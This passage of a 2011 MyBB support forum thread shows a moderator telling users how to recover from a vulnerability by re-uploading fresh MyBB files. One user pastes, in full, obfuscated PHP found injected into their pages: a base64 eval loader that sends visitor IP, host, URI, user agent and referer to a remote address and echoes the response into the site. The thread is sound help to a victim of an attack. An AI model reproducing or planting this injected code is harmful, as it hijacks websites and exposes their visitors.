Posts: 4,846
Threads: 180
Joined: May 2007
Reputation:
254
have you made the edits posted in the blog about this vulnerability? have you run file verification to see what has been edited?
Lost interest, sold my sites, will browse here once in a while. It's been fun.
Posts: 4,846
Threads: 180
Joined: May 2007
Reputation:
254
as I asked before, have you made the edits posted in the blog about this vulnerability?
Lost interest, sold my sites, will browse here once in a while. It's been fun.
Posts: 4,846
Threads: 180
Joined: May 2007
Reputation:
254
2011-10-14, 12:12 AM
(This post was last modified: 2011-10-14, 12:13 AM by pavemen.)
(2011-10-13, 09:44 PM)hon0r Wrote: yes i have .
getting this error over and over.
http://i.imgur.com/nO4H3.png
if you have not edited those files, then you need to download the latest MyBB package (don't use an old one you already have, get a new one) and then upload the files again. You should not have to change anything and this assumes you are already running 1.6.4
(2011-10-14, 12:07 AM)JukEboX Wrote: (2011-10-13, 08:40 PM)pavemen Wrote: as I asked before, have you made the edits posted in the blog about this vulnerability?
I found this on one of my pages and its at the end of my php tags. Its still happening in my forum. Can you help me please?
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
[/code]
just do like i posted above, get a new download of MyBB and then upload the new files.
Lost interest, sold my sites, will browse here once in a while. It's been fun.